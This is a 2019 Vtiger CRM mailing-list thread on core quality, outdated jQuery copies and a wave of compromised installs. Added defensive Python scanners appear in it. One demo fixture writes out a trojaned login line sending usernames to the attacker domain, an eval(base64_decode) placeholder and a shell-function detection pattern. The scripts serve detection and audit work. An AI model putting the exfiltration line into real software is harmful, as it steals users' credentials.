[Vtigercrm-developers] Core

Prasad prasad at vtiger.com
Wed Jun 12 14:57:03 GMT 2019


Błażej,

*Preface*

> I warn you, don’t read any further, it’s for your own good:)


I value your time spent on writing - so I had to forgo this warning :)

*Cooperation with the community and partners*

I hope you have sent pipeline enough merge requests for us to review.

*Core development*

> Everyone on this list knows that Vtiger doesn’t develop the core.


Thinking of making Vtiger the best is a daily task (more than 14 years!).
The core of 7.x has evolved to a state that addresses many business
use-cases.
Keeping the history of development and consumers in mind, moving with precaution
has always been adopted. Changing the internals is the goal for 8.x.

*Security*

> how is a user supposed to know how to configure a web server if the
> application doesn’t enforce or control that?


Web-server (Apache) configuration and monitoring is external to product
documentation. (This is my understanding).

Data security is always a top priority, and we have been very reactive in
releasing patches from time to time,
working with security advisories and community assistance.

> How can you be convinced that the system doesn’t allow any unauthorized
> access to the data if you have access from the www level to ALL files, even
> these in the ADMINISTRATOR’S section? It’s enough that in one of the views
> permissions aren’t verified and you can have access to the entire system.


Can you please cite or file issue details on code.vtiger.com so it can be
reviewed further?

Regarding CVE-2019-11358, CVE-2016-10707, CVE-2015-9251


Any browser (client) library would be running on top of the browser DOM API (if
I'm not wrong), so
would it mean the latest jQuery version is more secure than an older jQuery
version? Please correct me
if I did not understand your point.

> When a user logs in there aren’t any permissions, you can get access to any
> record in the system from many places even if you normally don’t have
> access to them.

> Access permissions aren’t centralized which makes it possible not to have
> permissions to something in one place, but have them in other places.


Access to endpoints (UI / API) is checked - can you please cite more
examples for this?

Regards,
Prasad
--
FB <http://www.facebook.com/vtiger> I Twit <http://twitter.com/vtigercrm> I
LIn <https://www.linkedin.com/company/1270573?trk=tyah> I Blog
<https://blogs.vtiger.com> I Website <https://www.vtiger.com/>
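An added example (mine, not code from this thread, from Vtiger or from YetiForce): Prasad asks whether a newer jQuery is actually more secure than an older one. The three CVEs cited in the quoted message below are each bound to a fixed-in release, so the question can be answered mechanically, per shipped copy. The script walks a web root, reads the banner comment of every .js file, and reports which jQuery copies fall inside an affected range. Assumptions: the banner regex covers the stock unminified and minified jQuery header formats; the affected ranges are as I read the advisories (CVE-2019-11358 below 3.4.0, CVE-2015-9251 below 3.0.0, CVE-2016-10707 the 3.0.0-rc1 pre-release only) and should be re-checked against NVD; the demo tree is constructed in a temp directory from a few of the paths in the list below, with made-up banner text, not from a real install.

```python
"""Inventory the jQuery copies under a web root and flag known-vulnerable versions."""
import os
import re
import tempfile
from dataclasses import dataclass

# Covers the unminified banner ("jQuery JavaScript Library v1.11.2") and the
# minified one ("/*! jQuery v1.7.1 ..."), including pre-release suffixes.
BANNER_RE = re.compile(r"jQuery(?: JavaScript Library)? v(\d+\.\d+(?:\.\d+)?(?:-[\w.]+)?)")


def parse_version(text):
    """'1.4' -> (1, 4, 0, ''); '3.0.0-rc1' -> (3, 0, 0, 'rc1')."""
    core, _, pre = text.partition("-")
    nums = [int(p) for p in core.split(".")]
    while len(nums) < 3:
        nums.append(0)
    return (nums[0], nums[1], nums[2], pre)


def before_release(ver, bound):
    """True when ver sorts before release `bound`; a pre-release of bound counts as before it."""
    return ver[:3] < bound or (ver[:3] == bound and ver[3] != "")


# Affected ranges as I read the advisories (assumption: re-check against NVD).
ADVISORIES = (
    ("CVE-2019-11358", "prototype pollution in jQuery.extend, fixed in 3.4.0",
     lambda v: before_release(v, (3, 4, 0))),
    ("CVE-2015-9251", "cross-domain AJAX text response run as script, fixed in 3.0.0",
     lambda v: before_release(v, (3, 0, 0))),
    ("CVE-2016-10707", "unbounded recursion on mixed-case boolean attribute names, 3.0.0-rc1 only",
     lambda v: v == (3, 0, 0, "rc1")),
)


@dataclass
class Finding:
    path: str
    version: str
    cves: list


def scan_tree(root):
    """Return one Finding per .js file whose header carries a jQuery banner, sorted by path."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".js"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                head = fh.read(4096)  # the banner sits in the first comment block
            m = BANNER_RE.search(head)
            if m is None:
                continue
            ver = parse_version(m.group(1))
            cves = [cve for cve, _, hit in ADVISORIES if hit(ver)]
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.append(Finding(rel, m.group(1), cves))
    return sorted(findings, key=lambda f: f.path)


# Constructed demo tree: a few paths from the list in the thread, with made-up banner text.
DEMO_FILES = {
    "layouts/v7/lib/jquery/jquery.min.js": "/*! jQuery v1.11.0 | jquery.org/license */\n!function(a,b){}();\n",
    "layouts/v7/lib/jquery/fullcalendar/lib/jquery.min.js": "/*! jQuery v3.1.1 | jquery.org/license */\n",
    "libraries/jquery/colorpicker/js/jquery.js": "/*!\n * jQuery JavaScript Library v1.3.2\n * http://jquery.com/\n */\n",
    "libraries/jquery/multiplefileupload/jquery.js": "/*!\n * jQuery JavaScript Library v1.4\n */\n",
    "layouts/v7/lib/jquery/daterangepicker/daterangepicker.js": "// plugin file without a jQuery banner\n",
}


def build_demo_tree():
    """Write DEMO_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="jquery-inventory-")
    for rel, content in DEMO_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_demo_tree()):
        status = ", ".join(f.cves) if f.cves else "no listed advisory applies"
        print(f"{f.path}: jQuery {f.version}: {status}")
```

Point scan_tree at the real document root instead of the demo directory. A plugin whose header says "requires jQuery v1.7" matches the banner regex too, so read the path together with the version. The duplicate copies are the real finding: a page that loads the 1.11.0 copy under layouts/ gains nothing from the 3.1.1 copy under fullcalendar/, which is why a single, centrally managed library base matters more than the newest version being present somewhere in the tree.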



On Wed, Jun 12, 2019 at 6:27 PM Błażej Pabiszczak <
b.pabiszczak at yetiforce.com> wrote:

> *Preface*
>
> I’m sure some of you missed me, as always - I’ll say my piece and vanish
> for a few years to take care of some more important stuff. I divided the
> email into a few parts so everyone can find something for themselves,
> however, I warn you, don’t read any further, it’s for your own good:)
>
>
> *Cooperation with the community and partners*
>
> For as long as I can remember (and that means more than 10 years), for some
> reason unknown to me, Vtiger has always ignored their community… at all possible
> layers, be it publishing modules in the store, or patching errors, or
> mailing list discussions. Questions were only answered in emergency
> situations (like now, where people start considering their own version of
> the system under a different name). I don’t know where it stems from, but
> Vtiger gained its popularity because it is open source, not the other way
> round, that’s why the community and partners should always be the priority.
> There weren’t so many systems some time ago, but now there are more than
> 1000 systems in the world and the number keeps growing daily. Basing
> business on software that is not supported by the producer (I’m talking
> about the open source version) will not be profitable. A simple example of
> that is how we described like 7 - 8 years ago that translations can’t
> combine different words but there have to be separate translations for each
> whole expression, otherwise the system would never be properly translated
> for many languages… and it still persists. How can you sell a system if it
> can’t even be translated? Just take a look at
> https://crowdin.com/project/suitecrmtranslations where the community
> contributes to more than 60 languages. How can you just reject this kind of
> free help and development? A professional translator would charge around
> $3,000-$4,000 for a single language, for 50 languages you’re saving
> $150,000 - $200,000.
>
>
> *Core development*
>
> Everyone on this list knows that Vtiger doesn’t develop the core. The
> problem can be noticed since at least version 5, although it probably
> existed earlier and I just don’t remember. Once in a blue moon (every 3-4
> yrs on average) Vtiger makes a quick update and releases a “new version”.
> Version 6 indeed introduced some crucial changes in MVC but it wasn’t a
> finished version (and still isn’t) and shouldn’t have been published.
> Version 6 was published haphazardly because nothing was done with version 5
> for around 3 years and the easiest solution was to copy stuff from the On
> Demand version… it was a marketing move that convinced many people who
> stayed here that this version was going to be updated...
>
> Unfortunately all the changes introduced for years (if there are any) only
> apply to the appearance and not core (framework), there are some funny
> attempts at supporting PHP 7 but it’s just cosmetics really (most of the
> errors are suppressed or ignored and none of the novelties in PHP are used)
>
> The truth is that the core is the type of architecture used 10 years ago…
> you add minor cosmetic changes just so it looks “sort of” decent, but what
> lies underneath is tragedy that nobody works on. How long can you ignore
> technological progress and when will the technological debt devour your
> system entirely?
>
>
> *Security*
>
> @Prasad how is a user supposed to know how to configure a web server if
> the application doesn’t enforce or control that? We were shown during our
> security audits that if a system doesn’t inform a user about wrong
> configuration then it is a breach of security - your audits don’t show
> these errors (these are basic assumptions for the app’s architecture
> according to OWASP ASVS).
>
> How can you be convinced that the system doesn’t allow any unauthorized
> access to the data if you have access from the www level to ALL files, even
> these in the ADMINISTRATOR’S section? It’s enough that in one of the views
> permissions aren’t verified and you can have access to the entire system.
>
> When a user logs in there aren’t any permissions, you can get access to
> any record in the system from many places even if you normally don’t have
> access to them. Access permissions aren’t centralized which makes it
> possible not to have permissions to something in one place, but have them
> in other places.
>
> There is no central PHP and JS library base in Vtiger which means that you
> don’t know how many and what kind of libraries there are in the system, and
> what’s more important, you don’t know how many of them have critical
> vulnerabilities. Last time I checked there were over 60 outdated libraries in
> Vtiger itself and 55 of them had some critical vulnerabilities. A good
> example is jquery:
>
>    - jQuery v1.4.2 [kcfinder\js\jquery.js]
>    - jQuery v1.11.2
>    [\layouts\v7\lib\jquery\daterangepicker\jquery-1.11.2.min.js]
>    - jQuery v3.1.1 [\layouts\v7\lib\jquery\fullcalendar\lib\jquery.min.js]
>    - jQuery v1.11.0 [\layouts\v7\lib\jquery\jquery.min.js]
>    - jQuery v1.7.1
>    [\libraries\bootstrap\js\eternicode-bootstrap-datepicker\tests\assets\jquery-1.7.1.min.js]
>    - jQuery v1.7.1 [\libraries\bootstrap\js\tests\vendor\jquery.js]
>    - jQuery v1.3.2 [\libraries\jquery\colorpicker\js\jquery.js]
>    - jQuery v1.8.3 [\libraries\jquery\gantt\libs\jquery.1.8.js]
>    - jQuery v1.7 [\libraries\jquery\jquery.min.js]
>    - jQuery v1.4 [\libraries\jquery\multiplefileupload\jquery.js]
>    - jQuery v1.8.0 [\migrate\resources\js\jquery-min.js]
>    - jQuery v1.8.0 [\test\migration\js\jquery-min.js]
>
> So tell me honestly Prasad, what security are you talking about? If file
> access is public, if dozens of the same libraries in different versions
> with different vulnerabilities are in the system (eg.  CVE-2019-11358,
> CVE-2016-10707, CVE-2015-9251) then what security are we talking about?!
> From the programming perspective it’s impossible to guess what and where to
> use in a mess like this.
>
> *Documentation*
>
> I applaud you for the documentation, but the truth is that 3/4 of the
> system should be rewritten from scratch. Creating documentation for the
> current version makes no sense. And creating documentation without the
> producers makes even less sense. The documentation must be a part of the
> code production process, otherwise it will be worthless. The only right way
> is to create the documentation together or separate yourselves from Vtiger
> completely and make your own fork.
>
>
> *Summary*
>
> Vtiger, keep it up! You have taken a very good direction to destroy
> something you have been building for 15 years… With such pace of
> development in technology and programming companies, it isn’t a matter of
> 5-7 years but probably 2-3 when you notice a significant decrease of
> popularity and customers.
>
> --
>
> Błażej Pabiszczak
>
> On 12 Jun 2019 at 06:22, Prasad <prasad at vtiger.com> wrote:
>
> Just to be clear Vtiger CRM Product does not open up access to
> unauthorized users.
>
> We highly recommend ensuring the web-server is set up with best security
> practice
> and access restriction be applied whenever possible to deny attempts from
> untrusted
> source or users.
>
> It is also good to choose your hosting provider who has experience and
> follows
> best data-protection policies.
>
> Regards,
> Prasad
> --
> FB <http://www.facebook.com/vtiger> I Twit <http://twitter.com/vtigercrm>
>  I LIn <https://www.linkedin.com/company/1270573?trk=tyah> I Blog
> <https://blogs.vtiger.com> I Website <https://www.vtiger.com/>
>
>
> On Tue, Jun 11, 2019 at 10:01 PM nilay khatri <nilay.spartan at gmail.com>
> wrote:
>
> I am not sure how many service providers have been affected from a hacking
> attack.
>
> But there is some one notorious who is targeting Vtiger Open Source
> installations.
>
> We have received requests from over 250 Vtiger Open Source users to check
> the installations, as they have been compromised and it presents a yellow
> screen with some sort of message.
>
> One common thing which we have observed is that the attacker modifies the
> Login action and adds code to send user's login information to
> vtigersupport.com .
>
> We have informed Vtiger team as well about this and request the whole
> community to have a check on the CRM installations done by them and to set
> up rule to block any network traffic to vtigersupport.com.
>
> Also look for the following:
>
> 1. Check whether there is any occurrence of the VGS Document Manager module that
> you have not installed explicitly. If you have installed it, make sure the file
> permissions are good so that users cannot explore any files on the server
> which they are not supposed to. (No hard feelings, VGS/Maggi)
>
> 2. Check for any malicious file in the WSAPP, SMSNotifier module directories and
> language folders
>
> If possible and not required, disable the option to import zip files from
> Module Manager
>
> We will be sharing more information on this soon and also with a security
> update.
>
> -Nilay
> _______________________________________________
> http://www.vtiger.com/
>
>
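Added example for the checks Nilay lists above (my code, not from Nilay, Vtiger or the thread): search PHP and JS files for the exfiltration domain, flag code that has no business in a language pack or in the WSAPP and SMSNotifier module directories, list module directories carrying the VGS prefix, and compare the install file by file against an unpacked release archive. Assumptions: the Login action lives at modules/Users/actions/Login.php and the dropped module directory starts with "VGS" (both are guesses about layout; adjust to the install); the suspicious-function list is a heuristic and will need tuning; the two demo trees are constructed in temp directories, with an inert placeholder standing in for the credential-stealing line.

```python
"""Check a Vtiger install for the indicators of compromise described in the thread."""
import hashlib
import os
import re
import tempfile

EXFIL_DOMAIN = "vtigersupport.com"
# Directories the message asks to inspect, relative to the document root.
WATCH_DIRS = ("modules/WSAPP/", "modules/SMSNotifier/", "languages/")
# Heuristic: calls that have no business in a language pack or a stock module file.
SUSPICIOUS_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|shell_exec|passthru|system|assert)\s*\(")
# Assumption: the dropped module directory carries the vendor prefix.
UNEXPECTED_MODULE_RE = re.compile(r"^VGS", re.IGNORECASE)


def iter_files(root, exts=(".php", ".js")):
    """Yield (absolute path, slash-separated relative path) for code files under root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                yield full, os.path.relpath(full, root).replace(os.sep, "/")


def scan_install(root):
    """Return the three indicator lists; a clean tree yields three empty lists."""
    report = {"exfil": [], "suspicious": [], "unexpected_modules": []}
    for full, rel in iter_files(root):
        with open(full, "r", encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
        if EXFIL_DOMAIN in text:  # plain-string match; an obfuscated host will not match
            report["exfil"].append(rel)
        if rel.startswith(WATCH_DIRS):
            m = SUSPICIOUS_RE.search(text)
            if m:
                report["suspicious"].append((rel, m.group(1)))
    modules_dir = os.path.join(root, "modules")
    if os.path.isdir(modules_dir):
        for name in sorted(os.listdir(modules_dir)):
            if UNEXPECTED_MODULE_RE.match(name):
                report["unexpected_modules"].append("modules/" + name)
    for key in report:
        report[key].sort()
    return report


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def diff_against_pristine(install_root, pristine_root):
    """(changed, extra): files that differ from, or are absent in, an unpacked release archive."""
    pristine = {rel: sha256_of(full) for full, rel in iter_files(pristine_root)}
    changed, extra = [], []
    for full, rel in iter_files(install_root):
        if rel not in pristine:
            extra.append(rel)
        elif sha256_of(full) != pristine[rel]:
            changed.append(rel)
    return sorted(changed), sorted(extra)


# Constructed sample files (assumed layout: the Login action at modules/Users/actions/Login.php).
CLEAN_LOGIN = """<?php
class Users_Login_Action extends Vtiger_Action_Controller {
    public function process(Vtiger_Request $request) {
        $user = new Users();
        return $user->doLogin($request->get('username'), $request->get('password'));
    }
}
"""
# The trojaned copy posts the submitted username to the attacker domain before logging in.
TROJANED_LOGIN = CLEAN_LOGIN.replace(
    "$user = new Users();",
    "@file_get_contents('http://vtigersupport.com/c.php?u=' . urlencode($request->get('username')));\n"
    "        $user = new Users();")
CLEAN_LANG = "<?php\n$languageStrings = array('LBL_LOGIN' => 'Login');\n"
BACKDOORED_LANG = CLEAN_LANG + "eval(base64_decode('Li4u'));  // inert placeholder payload\n"


def _write(root, rel, content):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(content)


def build_demo_trees():
    """Two temp trees: the unpacked release, and an install showing every indicator."""
    pristine = tempfile.mkdtemp(prefix="vtiger-pristine-")
    install = tempfile.mkdtemp(prefix="vtiger-install-")
    for root in (pristine, install):
        _write(root, "modules/WSAPP/WSAPP.php", "<?php\nclass WSAPP extends Vtiger_Module_Model {}\n")
    _write(pristine, "modules/Users/actions/Login.php", CLEAN_LOGIN)
    _write(pristine, "languages/en_us/Users.php", CLEAN_LANG)
    _write(install, "modules/Users/actions/Login.php", TROJANED_LOGIN)
    _write(install, "languages/en_us/Users.php", BACKDOORED_LANG)
    _write(install, "modules/VGSDocumentManager/VGSDocumentManager.php", "<?php\n// dropped module\n")
    return install, pristine


if __name__ == "__main__":
    install, pristine = build_demo_trees()
    for key, hits in scan_install(install).items():
        print(f"{key}: {hits}")
    changed, extra = diff_against_pristine(install, pristine)
    print("changed since release:", changed)
    print("not in release:", extra)
```

Run scan_install against the document root and diff_against_pristine against a release archive of the same version unpacked beside it. The extras list will contain every legitimately added module and language pack, so it is a review list rather than a verdict; the changed list is the one to read first, starting with the Login action. None of this replaces the egress block for vtigersupport.com that Nilay asks for, which belongs at the firewall rather than in the application.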